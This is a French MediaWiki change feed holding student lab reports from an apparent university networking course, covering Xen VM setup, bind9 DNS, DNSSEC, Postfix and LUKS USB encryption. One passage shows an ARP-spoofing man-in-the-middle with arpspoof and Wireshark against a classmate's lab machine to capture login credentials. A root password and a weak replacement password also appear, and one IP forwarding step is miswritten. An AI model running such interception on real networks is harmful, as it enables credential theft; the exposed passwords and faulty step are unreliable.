On regarde dans un premier temps si le pc peut se comporter comme un routeur avec la commande &amp;lt;code&amp;gt;cat /proc/sys/net/ipv4/ip_forward&amp;lt;/code&amp;gt; normalement il nous notifie '0' se qui prouve que le pc ne se comporte pas comme un routeur. On utilise la commande &amp;lt;code&amp;gt;cat /proc/sys/net/ipv4/ip_forward&amp;lt;/code&amp;gt; pour faire passer la variable a 1. maintenant le PC peut se comporter comme un routeur.&lt;br /&gt;
&lt;br /&gt;
On fait la commande &amp;lt;code&amp;gt;cat /proc/sys/net/ipv4/conf/all/rp_filter&amp;lt;/code&amp;gt; la variable recu doit être a '0' ce qui permet aux pc de renvoyer les requètes sur l'interface qui les a recu.&lt;br /&gt;
&lt;br /&gt;
Ensuite on fait un &amp;lt;code&amp;gt;ip r&amp;lt;/code&amp;gt; pour récupérer l'adresse ip du routeur.&lt;br /&gt;
[[Fichier:Ip_r_mirage.png|1000px|thumb|left|capture de la commande ip r]]&lt;br /&gt;
&amp;lt;br style=&amp;quot;clear: both;&amp;quot; \&amp;gt;&lt;br /&gt;
&lt;br /&gt;
On fait la commande &amp;lt;code&amp;gt;arpspoof -i bridge -t zabeth07 172.26.145.254&amp;lt;/code&amp;gt;&lt;br /&gt;
On lance Wireshark en root en utilisant la commande &amp;lt;code&amp;gt;su&amp;lt;/code&amp;gt; si celui ci n'est pas installer on fait préalablement &amp;lt;code&amp;gt;apt-get install wireshark&amp;lt;/code&amp;gt;&lt;br /&gt;
Une fois Wireshark lancé, on filtre tout les paquets en provenance de nottre cible la zabeth07.&lt;br /&gt;
Il faut fauire attention de bien désativer les proxi dans firefow sinon cela ne fonctionne pas.&lt;br /&gt;
&lt;br /&gt;
[[Fichier:Wireshark_mirage.png|1000px|thumb|left|capture de Wiresharkf]]&lt;br /&gt;
&amp;lt;br style=&amp;quot;clear: both;&amp;quot; \&amp;gt;&lt;br /&gt;
&lt;br /&gt;
On peut voir que on a bien recupérer les mdp lors de la connexion aux site 'applications.polytech-lille.net'.&lt;br /&gt;
 Non d'utilisateur : Oui le pas de calais&lt;br /&gt;
 Mdp : le mdp&lt;br /&gt;
&lt;br /&gt;
=== Intrusion sur un serveur d’application Web===&lt;br /&gt;
&lt;br /&gt;
==Réalisations==&lt;br /&gt;
&lt;br /&gt;
===Sécurisation de données===&lt;br /&gt;
&lt;br /&gt;
===Chiffrement de données===&lt;br /&gt;
&lt;br /&gt;
Parfois il est necessaire de chiffrer les données importante,d'avoir des clef USB, ou des fichier sécuriser. Pour sécuriser la clef USB, on va utilisé 'cryptsetup'&lt;br /&gt;
pour commancer on installe les paquetages 'lvm2' et 'cryptsetup'.&lt;br /&gt;
 apt-get install cryptsetup&lt;br /&gt;
 apt-get install lvm2 &lt;br /&gt;
&lt;br /&gt;
Le [https://doc.ubuntu-fr.org/cryptsetup site] on peut trouver la liste des commandes necessaire pour crypter le clef USB.&lt;br /&gt;
&lt;br /&gt;
Premièrement on va formaté la clef usb pour avoir un disque propre avec la commande &amp;lt;code&amp;gt;mkfs.vfat -n 'Alex.G' -I /dev/sdb1&amp;lt;/code&amp;gt; on obtien le nom de la clef USB avec la commande &amp;lt;code&amp;gt;df -h&amp;lt;/code&amp;gt;&lt;br /&gt;
On a maintenant une clef USB clean qui a comme nom Alex.G et un format FAT32.&lt;br /&gt;
&lt;br /&gt;
On peut lancer le cryptage de la clef USB avec la commande &amp;lt;code&amp;gt;cryptsetup luksFormat -c aes-xts-plain -s 512 /dev/sdb&amp;lt;/code&amp;gt; Pour savoir ou les la clef USB on utilise la commande &amp;lt;code&amp;gt;lsblk&amp;lt;/code&amp;gt;&lt;br /&gt;
On choisi un mdp pour le clef USB, puis on envoie le fichier etc sur le clef pour vérifier si il est bien encrypter. Une fois la clef crypter avec un fichier dessu, on va sur un autre pc et on, vérifie si le fichier est bien crypter.&lt;br /&gt;
La liste des commande utilisé est listé ci-dessous : &lt;br /&gt;
 mount /dev/mapper/Alex.G /mnt&lt;br /&gt;
 cp -r /etc /mnt&lt;br /&gt;
 umount /mnt&lt;br /&gt;
 cryptsetup luksClose Alex.G&lt;br /&gt;
&lt;br /&gt;
On peut voir que le clef USB crypter fonctionne bien.&lt;br /&gt;
[[Fichier:ClefUSBLock_2020-11-13_11-48-55.png|1000px|thumb|left|Cryptage de la clef USB]]&lt;br /&gt;
&amp;lt;br style=&amp;quot;clear: both;&amp;quot; \&amp;gt;&lt;br /&gt;
&lt;br /&gt;
===Inspection ARP par un élément réseau===&lt;br /&gt;
&lt;br /&gt;
===Sécurisation WiFi par WPA2-EAP===&lt;/div&gt;</summary>
		<author><name>Aglaine</name></author>	</entry>

	<entry>
		<id>https://wiki-ima.plil.fr/mediawiki//index.php?title=Fichier:SSL_Certification_Gandi_Mirage.png&amp;diff=53936</id>
		<title>Fichier:SSL Certification Gandi Mirage.png</title>
		<link rel="alternate" type="text/html" href="https://wiki-ima.plil.fr/mediawiki//index.php?title=Fichier:SSL_Certification_Gandi_Mirage.png&amp;diff=53936"/>
				<updated>2020-11-20T08:53:58Z</updated>
		
		<summary type="html">&lt;p&gt;Aglaine : &lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;&lt;/div&gt;</summary>
		<author><name>Aglaine</name></author>	</entry>

	<entry>
		<id>https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA2a5_2020/2021_G5&amp;diff=53935</id>
		<title>TP sysres IMA2a5 2020/2021 G5</title>
		<link rel="alternate" type="text/html" href="https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA2a5_2020/2021_G5&amp;diff=53935"/>
				<updated>2020-11-20T08:51:56Z</updated>
		
		<summary type="html">&lt;p&gt;Aglaine : /* renvoie du mail Gandi */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;== Introduction ==&lt;br /&gt;
&lt;br /&gt;
Cet atelier consiste en la réalisation d’une maquette de réseau permettant de manipuler les protocoles de redondance réseau ainsi que le protocole réseau IPv6. D’un point de vue système vous aurez à installer une machine virtuelle Xen et à y configurer des services. Enfin la mise en place d’un réseau WiFi sécurisé et d’un site web sécurisé vous permettent de mettre en pratiques vos connaissances en la matière.&lt;br /&gt;
&lt;br /&gt;
=== Tableau Récapitulatif ===&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot; style=&amp;quot;text-align: center;width: 35%;margin: auto;&amp;quot;&lt;br /&gt;
! Description !! Détails&lt;br /&gt;
|-&lt;br /&gt;
! scope=&amp;quot;row&amp;quot; style=&amp;quot;width: 40%&amp;quot;|ID VLAN&lt;br /&gt;
|style=&amp;quot;width: 60%&amp;quot;|Vlan7&lt;br /&gt;
|-&lt;br /&gt;
! scope=&amp;quot;row&amp;quot; style=&amp;quot;width: 40%&amp;quot;|Réseau IP V4&lt;br /&gt;
|style=&amp;quot;width: 60%&amp;quot;|193.48.57.168&lt;br /&gt;
|-&lt;br /&gt;
! scope=&amp;quot;row&amp;quot; style=&amp;quot;width: 40%&amp;quot;|Réseau IP V6&lt;br /&gt;
|style=&amp;quot;width: 60%&amp;quot;|&lt;br /&gt;
|-&lt;br /&gt;
! scope=&amp;quot;row&amp;quot; style=&amp;quot;width: 40%&amp;quot;|Nom de de la VM &lt;br /&gt;
|style=&amp;quot;width: 60%&amp;quot;|mirage&lt;br /&gt;
|-&lt;br /&gt;
! scope=&amp;quot;row&amp;quot; style=&amp;quot;width: 40%&amp;quot;|Numéro de poste&lt;br /&gt;
|style=&amp;quot;width: 60%&amp;quot;|Zabeth06&lt;br /&gt;
|-&lt;br /&gt;
! scope=&amp;quot;row&amp;quot; style=&amp;quot;width: 40%&amp;quot;|Adresse du site internet version HTTP&lt;br /&gt;
|style=&amp;quot;width: 60%&amp;quot;|&lt;br /&gt;
|-&lt;br /&gt;
! scope=&amp;quot;row&amp;quot; style=&amp;quot;width: 40%&amp;quot;|Adresse du site internet version HTTPS&lt;br /&gt;
|style=&amp;quot;width: 60%&amp;quot;|&lt;br /&gt;
|-&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
== Installation des systèmes d’exploitation == &lt;br /&gt;
&lt;br /&gt;
Pour installer une Machine Virtuelle, il faut d'abord se connecter sur le disque de virtualisation.&lt;br /&gt;
Pour cela, il faut utiliser la commande : &lt;br /&gt;
 ssh capbreton.plil.info&lt;br /&gt;
&lt;br /&gt;
=== Installation dans la machine virtuelle Xen ===&lt;br /&gt;
&lt;br /&gt;
Une fois connecter, il faut lancer la création de la Machine virtuelle avec la commande :&lt;br /&gt;
  xen-create-image --hostname=mirage --ip 193.48.57.168 --netmask=255.255.255.0 --gateway=100.64.0.5 --dist=ascii --dir=/usr/local/xen --force&lt;br /&gt;
&lt;br /&gt;
L'installation prend un certain temps pour regarder si l'installation se déroule bien, on peut ouvrir un second terminale connecté en SSH a &amp;quot;capbreton&amp;quot; puis on utilise la commande : &lt;br /&gt;
 tail -f /var/log/xen-tools/mirage.0.log&lt;br /&gt;
&lt;br /&gt;
A la fin de l'installation, on obtient le mot de passe root et des informations importantes :&lt;br /&gt;
      Installation Summary&lt;br /&gt;
     ---------------------&lt;br /&gt;
     Hostname        :  mirage&lt;br /&gt;
     Distribution    :  ascii&lt;br /&gt;
     MAC Address     :  xxxxxxxxxxx&lt;br /&gt;
     IP Address(es)  :  dynamic&lt;br /&gt;
     SSH Fingerprint :  SHA256:xxxxxxx (DSA)&lt;br /&gt;
     SSH Fingerprint :  SHA256:xxxxxxx (ECDSA)&lt;br /&gt;
     SSH Fingerprint :  SHA256:xxxxxxx (ED25519)&lt;br /&gt;
     SSH Fingerprint :  SHA256:xxxxxxx (RSA)&lt;br /&gt;
     Root Password   :  DgtUlOmnBFERdfarGBsopGR&lt;br /&gt;
&lt;br /&gt;
Une fois la VM créer, nous pouvons la lancer avec la commande :&lt;br /&gt;
 xl create /etc/xen/mirage.cfg&lt;br /&gt;
&lt;br /&gt;
On peut vérifier que le VM est bien démarrer avec la commande :&lt;br /&gt;
 xl list&lt;br /&gt;
Pour fonctionner l'état de la VM doit être r ou -b&lt;br /&gt;
[[Fichier:LancementVm.PNG|1000px|thumb|left|Liste des VM en fonctionnement]]&lt;br /&gt;
&lt;br /&gt;
&amp;lt;br style=&amp;quot;clear: both;&amp;quot; \&amp;gt;&lt;br /&gt;
&lt;br /&gt;
On accède pour la premier fois a nottre Vm avec la commande :&lt;br /&gt;
 xl console mirage&lt;br /&gt;
&lt;br /&gt;
il demande alors le login (root) et le mdp (longue chaine précédemment générée). &lt;br /&gt;
Après nous être logué, on change le mot de passe qui devient : glopglopglop.&lt;br /&gt;
&lt;br /&gt;
=== Configuration de la machine virtuelle Xen ===&lt;br /&gt;
&lt;br /&gt;
Il faut maintenant installer les packages que nous avons besoins : &lt;br /&gt;
 apt-get update&lt;br /&gt;
 apt-get install VIM&lt;br /&gt;
&lt;br /&gt;
Il faut configurer l'adresse IP et le mask de la VM. Pour cela on utilise la commande :&lt;br /&gt;
 vim /etc/network/interfaces&lt;br /&gt;
&lt;br /&gt;
Dans interfaces on tajoute &lt;br /&gt;
 auto eth0&lt;br /&gt;
 iface eth0 inet static&lt;br /&gt;
 address 193.48.57.168&lt;br /&gt;
 gateway 193.58.57.163&lt;br /&gt;
 netmask 255.255.255.248&lt;br /&gt;
&lt;br /&gt;
Pour que la machine soit joignable par SSH via l'extérieure il est nécessaire de configurer la passerelle et le ssh_config. Pour cela on utilise la commande :&lt;br /&gt;
 vi /etc/ssh/ssh_config&lt;br /&gt;
 &lt;br /&gt;
Le fichier ssh_config doit être configurer comme ci dessous :&lt;br /&gt;
 Host *&lt;br /&gt;
 SendEnv LANH LC_*&lt;br /&gt;
 HashKnownHOST yes&lt;br /&gt;
 GSSAPIAuthentification yes&lt;br /&gt;
&lt;br /&gt;
Sur Capbreton, une paserell doit être mis en place pour pouvoir connecté les VM aux monde extérieure.&lt;br /&gt;
Pour cela on configure ces interfacte avec la commande : &lt;br /&gt;
 vim/etc/network/interfaces&lt;br /&gt;
&lt;br /&gt;
Puis on configure la passerelle comem ci dessous : &lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
 # The loopback network interface&lt;br /&gt;
  auto lo&lt;br /&gt;
  iface lo inet loopback&lt;br /&gt;
 &lt;br /&gt;
  # Physical Network Interfaces&lt;br /&gt;
  #&lt;br /&gt;
 auto eth&lt;br /&gt;
  iface eth inet static&lt;br /&gt;
    address 192.168.0.29&lt;br /&gt;
    netmask 255.255.255.0&lt;br /&gt;
    gateway 192.168.0.1&lt;br /&gt;
 &lt;br /&gt;
 auto eth0&lt;br /&gt;
  iface eth0 inet manual&lt;br /&gt;
   post-up ip link set $IFACE up&lt;br /&gt;
   post-down ip link set $IFACE down&lt;br /&gt;
 &lt;br /&gt;
 auto eth1&lt;br /&gt;
  iface eth1 inet manual&lt;br /&gt;
   post-up ip link set $IFACE up&lt;br /&gt;
   post-down ip link set $IFACE down&lt;br /&gt;
 &lt;br /&gt;
 auto eth2&lt;br /&gt;
 iface eth2 inet manual&lt;br /&gt;
  post-up ip link set $IFACE up&lt;br /&gt;
  post-down ip link set $IFACE down&lt;br /&gt;
 &lt;br /&gt;
 auto eth4&lt;br /&gt;
 iface eth4 inet manual&lt;br /&gt;
  post-up ip link set $IFACE up&lt;br /&gt;
  post-down ip link set $IFACE down&lt;br /&gt;
 &lt;br /&gt;
 auto eth5&lt;br /&gt;
 iface eth5 inet manual&lt;br /&gt;
  post-up ip link set $IFACE up&lt;br /&gt;
  post-down ip link set $IFACE down&lt;br /&gt;
 &lt;br /&gt;
 auto eth6&lt;br /&gt;
 iface eth6 inet manual&lt;br /&gt;
  post-up ip link set $IFACE up&lt;br /&gt;
  post-down ip link set $IFACE down&lt;br /&gt;
 &lt;br /&gt;
 auto eth7&lt;br /&gt;
 iface eth7 inet manual&lt;br /&gt;
  post-up ip link set $IFACE up&lt;br /&gt;
  post-down ip link set $IFACE down&lt;br /&gt;
 &lt;br /&gt;
 # Main trunk bridge&lt;br /&gt;
 #&lt;br /&gt;
 auto Trunk&lt;br /&gt;
 iface Trunk inet manual&lt;br /&gt;
  bridge_ports eth4 eth5&lt;br /&gt;
  post-up ip link set $IFACE up&lt;br /&gt;
  post-down ip link set $IFACE down&lt;br /&gt;
 &lt;br /&gt;
 # Virtual Network Interfaces&lt;br /&gt;
 #&lt;br /&gt;
 &lt;br /&gt;
 auto vlan48&lt;br /&gt;
 iface vlan48 inet static&lt;br /&gt;
  vlan-raw-device Trunk&lt;br /&gt;
  address 172.26.191.21&lt;br /&gt;
  netmask 255.255.252.0&lt;br /&gt;
  gateway 172.26.191.254&lt;br /&gt;
 iface vlan48 inet6 auto&lt;br /&gt;
 &lt;br /&gt;
 auto vlan500&lt;br /&gt;
 iface vlan500 inet manual&lt;br /&gt;
  vlan-raw-device Trunk&lt;br /&gt;
  post-up ip link set $IFACE up&lt;br /&gt;
  post-down ip link set $IFACE down&lt;br /&gt;
 &lt;br /&gt;
 auto vlan502&lt;br /&gt;
 iface vlan502 inet manual&lt;br /&gt;
  vlan-raw-device Trunk&lt;br /&gt;
  post-up ip link set $IFACE up&lt;br /&gt;
  post-down ip link set $IFACE down&lt;br /&gt;
 # Bridge for IMA5sc group&lt;br /&gt;
 #&lt;br /&gt;
 &lt;br /&gt;
 auto IMA5sc&lt;br /&gt;
 iface IMA5sc inet manual&lt;br /&gt;
  bridge_ports eth0 eth6&lt;br /&gt;
 # Bridge for IMA2a5&lt;br /&gt;
 #&lt;br /&gt;
 &lt;br /&gt;
 auto IMA2a5&lt;br /&gt;
 iface IMA2a5 inet manual&lt;br /&gt;
  bridge_ports eth1 eth7&lt;br /&gt;
 # Bridge for L3MRIT group&lt;br /&gt;
 #&lt;br /&gt;
 &lt;br /&gt;
 auto L3MRIT&lt;br /&gt;
 iface L3MRIT inet manual&lt;br /&gt;
  bridge_ports eth2&lt;br /&gt;
 # Bridge for GIS group&lt;br /&gt;
 #&lt;br /&gt;
 &lt;br /&gt;
 auto bridgeGIS&lt;br /&gt;
 iface bridgeGIS inet manual&lt;br /&gt;
  bridge_ports vlan502&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
== Architecture réseau ==&lt;br /&gt;
&lt;br /&gt;
===Sécurisation du réseau===&lt;br /&gt;
&lt;br /&gt;
==Services Internet==&lt;br /&gt;
&lt;br /&gt;
===Serveur SSH===&lt;br /&gt;
&lt;br /&gt;
On peux maintenant se connecté a la VM mirage avec la commande : &amp;lt;code&amp;gt;ssh root@193.48.57.168 -p 2222&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
===Serveur DNS===&lt;br /&gt;
Un serveur DNS (Domain Name System) permet d'effectuer correspondance entre un nom de domaine et une adresse IP. Grâce à DNS, il n'est pas nécessaire de se souvenir des adresses IP pour naviguer sur Ethernet. Pour installer notre propre serveur DNS nous avons utilisé Bind9.&lt;br /&gt;
&lt;br /&gt;
Nous commençons tout d'abord par installer bind9 via la commande suivante : &amp;lt;code&amp;gt;apt-get install bind9&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
==== Création et configuration named.conf.local ====&lt;br /&gt;
Le &amp;lt;code&amp;gt;named.conf.local&amp;lt;/code&amp;gt; permet de faire pointer un nom de domaine pleinement qualifié (FQDN fully qualified domain name) sur une adresse IP. &lt;br /&gt;
&lt;br /&gt;
Il faut tout d'abbord modifié le fichier &amp;lt;code&amp;gt;/etc/bind/named.conf.local&amp;lt;/code&amp;gt; qui contient la configuration DNS et y déclaré les zones associées au domaine ainsi qu'un fichier de description de la zone.&lt;br /&gt;
&lt;br /&gt;
[[Fichier:Mirage-config-named.conf.local.png|1000px|thumb|left|Configuration de mirage]]&lt;br /&gt;
&amp;lt;br style=&amp;quot;clear: both;&amp;quot; \&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Puis créé le fichier de configuration appelé &amp;lt;code&amp;gt;glopglop.site&amp;lt;/code&amp;gt; avec la commande &amp;lt;code&amp;gt;vim /etc/bind/glopglop.site&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
[[Fichier:Configuration_bind9.png|1000px|thumb|left|Configuration de bind9]]&lt;br /&gt;
&amp;lt;br style=&amp;quot;clear: both;&amp;quot; \&amp;gt;&lt;br /&gt;
&lt;br /&gt;
On relance le service 'bind9' avec la commande :&amp;lt;code&amp;gt;service bind9 restart&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
On vérifie que le DNS fonctionne bien avec le commande &amp;lt;code&amp;gt;host dns1.glopglop.site localhost&amp;lt;/code&amp;gt;&lt;br /&gt;
[[Fichier:Dns1.glopglop.site_2020-11-13_08-57-52.png|1000px|thumb|left|Vérification du DNS en local]]&lt;br /&gt;
&amp;lt;br style=&amp;quot;clear: both;&amp;quot; \&amp;gt;&lt;br /&gt;
Le DNS fonctionne donc bien.&lt;br /&gt;
&lt;br /&gt;
==== Configuration gandi.net ====&lt;br /&gt;
Grâce au registrar gandi.net, nous avons réservé le nom de domaine &amp;lt;code&amp;gt;glopglop.site&amp;lt;/code&amp;gt;. L'extension &amp;lt;code&amp;gt;.site&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
[[Fichier:Gandi-glopglop-VueGeneral.PNG|1000px|thumb|left|Image de la configuration de Gandi]]&lt;br /&gt;
&amp;lt;br style=&amp;quot;clear: both;&amp;quot; \&amp;gt;&lt;br /&gt;
&lt;br /&gt;
On va maintenant ajouter un &amp;quot;glue record&amp;quot; qui est un enregistrement collé. Il permet d'associer un nom d'hôte avec une adresse IP au registre.&lt;br /&gt;
Glue records fournis par gandi pour associer un hostname (nom de serveur ou DNS) à l'adresse IP de notre machine. Les modifications seront effectives entre 12 et 24 heures.&lt;br /&gt;
&lt;br /&gt;
[[Fichier:Mirage-Ajoue-GlueRecord.PNG|1000px|thumb|left|Image de la configuration de Gandi avec Glue Record]]&lt;br /&gt;
&amp;lt;br style=&amp;quot;clear: both;&amp;quot; \&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Une fois le &amp;quot;glue record&amp;quot; renseigner se qui va lié nottre dns a une ip, il faur renseigner les serveur de non. cela prend 27/72h.&lt;br /&gt;
Il faut bien faire attention que la VM soit correctement configurer avec 'bind9' car c'est lui qui donne IPv4 et IPv6 correspondant à vos noms de machines. Si ce n'est pas le cas gandi ne pourras pas liée les dns a l'ip de la machine.&lt;br /&gt;
&lt;br /&gt;
[[Fichier:GandiDNS_2020-11-13_09-00-16.png|1000px|thumb|left|DNS sur GANDI]]&lt;br /&gt;
&amp;lt;br style=&amp;quot;clear: both;&amp;quot; \&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Une fois les serveuyrs de non configurer, on peux fermer GANDI.&lt;br /&gt;
&lt;br /&gt;
===Sécurisation de site web par certificat===&lt;br /&gt;
&lt;br /&gt;
===Sécurisation de serveur DNS par DNSSEC===&lt;br /&gt;
Premièrement, on ajoute &amp;lt;code&amp;gt;l'obtion dnssec-enable yes;&amp;lt;/code&amp;gt; dans le fichier &amp;lt;code&amp;gt;named.conf.options&amp;lt;/code&amp;gt;.&lt;br /&gt;
====Génération des clef asymétrique====&lt;br /&gt;
Il est important de bien sauvegarder la clef privée, sinon nottre système de clef ne fonctionnera pas.&lt;br /&gt;
pour commancer, on crée un repertoire pour stocker les clef.&lt;br /&gt;
  cd /etc/bind&lt;br /&gt;
  mkdir glopglop.site.dnssec&lt;br /&gt;
  cd glopglop.site.dnssec/&lt;br /&gt;
&lt;br /&gt;
Une fois dans le dossier &amp;lt;code&amp;gt;glopglop.site.dnssec&amp;lt;/code&amp;gt;, on crée les clefs avec la commande&amp;lt;code&amp;gt;dnssec-keygen -r /dev/urandom -a RSASHA1 -b 2048 -f KSK -n ZONE glopglop.site&amp;lt;/code&amp;gt;&lt;br /&gt;
On obtien : &lt;br /&gt;
 Generating key pair...............+++++ ..........................................+++++ &lt;br /&gt;
 Kglopglop.site.+005+15337&lt;br /&gt;
&lt;br /&gt;
On crée ensuite le clef asymétrique pour la signature des enregistrements, pour cela on utilise la commande &amp;lt;code&amp;gt;dnssec-keygen -r /dev/urandom -a RSASHA1 -b 1024 -n ZONE glopglop.site&amp;lt;/code&amp;gt;&lt;br /&gt;
On obtien : &lt;br /&gt;
 Generating key pair................+++++ ..................................................+++++ &lt;br /&gt;
 Kglopglop.site.+005+55608&lt;br /&gt;
&lt;br /&gt;
On a bien maintenant la paire de clef privée/publique. Le problème est qu'il est difficile de les distinguer avec leurs nom compliquer, il faut donc les rennomer pouyr plus de transparance.&lt;br /&gt;
On renomme donc les deux paires de clefs obtenues en utilisant le nom de la zone comme préfixe puis en suffixant d’abord par la destination de la clef (-ksk pour la KSK ou -zsk pour la ZSK) puis par le type de clef (.key pour la clef publique ou .private pour la clef privée);&lt;br /&gt;
&lt;br /&gt;
 mv Kglopglop.site.+005+15337.key glopglop.site-ksk.key&lt;br /&gt;
 mv Kglopglop.site.+005+15337.private glopglop.site-ksk.private&lt;br /&gt;
 mv Kglopglop.site.+005+55608.key glopglop.site-zsk.key&lt;br /&gt;
 mv Kglopglop.site.+005+55608.private glopglop.site-zsk.private&lt;br /&gt;
&lt;br /&gt;
[[Fichier:ClefPrivéePublique_2020-11-13_09-23-42.png|1000px|thumb|left|Clef Privée et Public]]&lt;br /&gt;
&amp;lt;br style=&amp;quot;clear: both;&amp;quot; \&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Dans &amp;lt;code&amp;gt;db.glopglop.site&amp;lt;/code&amp;gt; on ajoute les deux lignes ci-dessous : &lt;br /&gt;
 $include /etc/bind/glopglop.site.dnssec/glopglop.site-ksk.key&lt;br /&gt;
 $include /etc/bind/glopglop.site.dnssec/glopglop.site-zsk.key&lt;br /&gt;
&lt;br /&gt;
On signe la zone d'enregistremment avec la commande &amp;lt;code&amp;gt;dnssec-signzone -o glopglop.site -k glopglop.site-ksk ../db.glopglop.site glopglop.site-zsk&amp;lt;/code&amp;gt;&lt;br /&gt;
[[Fichier:Zones_d'enregistrement_2020-11-13_10-27-11.png|1000px|thumb|left|Generation des zones d'enregistrement]]&lt;br /&gt;
&amp;lt;br style=&amp;quot;clear: both;&amp;quot; \&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Les clef sont maintenant fonctionelle il faut donc les ajouter a GANDI, pour cela on se connecte a gandi puis on ajoute une clef KSK.&lt;br /&gt;
pour obtenir la cled on utilise la commande &amp;lt;code&amp;gt;cat glopglop.site-ksk.key&amp;lt;/code&amp;gt; on obtien le résultat ci-dessous : &lt;br /&gt;
 ; This is a key-signing key, keyid 15337, for glopglop.site.&lt;br /&gt;
 ; Created: 20201113090442 (Fri Nov 13 09:04:42 2020)&lt;br /&gt;
 ; Publish: 20201113090442 (Fri Nov 13 09:04:42 2020)&lt;br /&gt;
 ; Activate: 20201113090442 (Fri Nov 13 09:04:42 2020)&lt;br /&gt;
 glopglop.site. IN DNSKEY 257 3 5 AwEAAc3TCJkWFGnZSj/Q364AF7n69UaXum/no+LuEbXbGjTXLETdYk+Q gVAmIpvbJXcG0rucJTbVFaHr8IhWqf7VvkCbEGAORAkzBVXThPDR1pZR lJDEY88Lb2T6k9uHw43l2oP8vPev2eIRbU3VxUuJs++elgj32DTBA+yK p++/gz29H6PQVpkHnH81RjGdV+K1RZEwxkuev2MmB329fhMRwTsbW0BV aeXc5faRk9ZEKb7tr0p7txVv4wZEL6it01ZiNyGktwLRj8ln+cQz1GtC PY/UWnCtamycE/2k4f98sdDa6TMiguuBNOPug+ODzqGiI7LNUyF4jBbf 6NAgChwITps=&lt;br /&gt;
&lt;br /&gt;
On ajoute la clef a gandi comme montrer ci-dessous en n'oubliant pas de selectionner '5(RSA/SHA-1'.&lt;br /&gt;
[[Fichier:Zones_d'enregistrement_2020-11-13_10-27-11.png|1000px|thumb|left|gandi enregistrement de la clef KSK]]&lt;br /&gt;
&amp;lt;br style=&amp;quot;clear: both;&amp;quot; \&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Pour vérifier que tout fonctionne correctement, on va sur le site 'dnsvizi.net' il nous permet d'analyser le dns et représanter la chaine d'autentification DNSSEC.&lt;br /&gt;
[[Fichier:DNSSEC_2020-11-13_11-59-06.png|1000px|thumb|left|Test du DNSSEC]]&lt;br /&gt;
&amp;lt;br style=&amp;quot;clear: both;&amp;quot; \&amp;gt;&lt;br /&gt;
&lt;br /&gt;
On peut voir que maintenant on a bien le statu 'SECURE' donc tout fonctionne bien.&lt;br /&gt;
&lt;br /&gt;
===Installation d'une méchagerie===&lt;br /&gt;
====Configuration de Postfix====&lt;br /&gt;
Pour recevoir le mail de vérfication de GANDI il faut sur la VM un gestionnaire de mail il faut installer mutt et postfix. On utilise les commandes ci-dessous : &lt;br /&gt;
 apt-get install postfix&lt;br /&gt;
 ant-get install mutt&lt;br /&gt;
&lt;br /&gt;
A l'installation de 'postfix' un fenètre de configuration s'ouver. &lt;br /&gt;
Il faut renseigner le non du site comme 'System mail name : 'glopglop.site'&lt;br /&gt;
&lt;br /&gt;
On vérifie la configuration de 'postix' en allant dans le 'main.cf'&lt;br /&gt;
 vi /etc/postfix/main.cf &lt;br /&gt;
&lt;br /&gt;
[[Fichier:Config Postfix mirage.png|1000px|thumb|left|Configuration de postfix]]&lt;br /&gt;
&amp;lt;br style=&amp;quot;clear: both;&amp;quot; \&amp;gt;&lt;br /&gt;
&lt;br /&gt;
On a bien le non de domaine 'glopglop.site' on peut relancer 'postfix'&lt;br /&gt;
 service postfix restart&lt;br /&gt;
Si le service n'est pas configurer correctement, on peut le reconfigurer avec la commande &amp;lt;code&amp;gt;dpkg-reconfigure postfix&amp;lt;/code&amp;gt;&lt;br /&gt;
====Réception d'un message====&lt;br /&gt;
On peux testé la reception de message en envoyant un message a 'roor@glopglop.site'&lt;br /&gt;
Si tout fonctionne bien, on peux visualisé les méssage recu en tappant la commande &amp;lt;code&amp;gt;mutt&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
[[Fichier:Reception_messages_mirage.png|1000px|thumb|left|texte descriptif]]&lt;br /&gt;
&amp;lt;br style=&amp;quot;clear: both;&amp;quot; \&amp;gt;&lt;br /&gt;
&lt;br /&gt;
On constate que on resoit bien les message en provenance du mail de Polytech.&lt;br /&gt;
Pour que gandi puissent nous envoyer le mail contenant la clef de cryptage, on a besoint de pouvoir recevoirr les messages qui sont destiné a 'admin@glopglop.site'&lt;br /&gt;
&lt;br /&gt;
Pour cela on va modifier le fichier 'vim /etc/aliases' en ajoutant la commande &amp;lt;code&amp;gt;admin:root&amp;lt;/code&amp;gt;&lt;br /&gt;
On crée ensuite un &amp;lt;code&amp;gt;newaliases&amp;lt;/code&amp;gt; puis on restarte bind9 avec la commance &amp;lt;code&amp;gt;service bind9 restart&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Attention pour les test il est conseiller d'utilisé deux boite mail différante care celle ci prenne du temps pour se mettre a jours.&lt;br /&gt;
&lt;br /&gt;
====Envoie du SSL Certification Gandi====&lt;br /&gt;
&lt;br /&gt;
Quand on est sure que le mail fonctionne bien avec l'envoie d'un message a destination de 'admin@glopglop.site' on peux demandé a gandi de bous envoyer la clef de cryptage.&lt;br /&gt;
On demande d'envoyet le ssl certification a notre VM, cela peux prendre un certain temps.&lt;br /&gt;
&lt;br /&gt;
==Tests d’intrusion==&lt;br /&gt;
&lt;br /&gt;
=== Description ===&lt;br /&gt;
Un ordinateur portable et une clef Wifi est fourni par Monsieur Redon. Pour que le clef fonctionne il est nécessite pas nécessairement de la configuration. Il faut aussi installer les paquetages nécessaire pour craquer la clef Wep et la clef WPA &lt;br /&gt;
&lt;br /&gt;
=== Installation de la clef Wifi ===&lt;br /&gt;
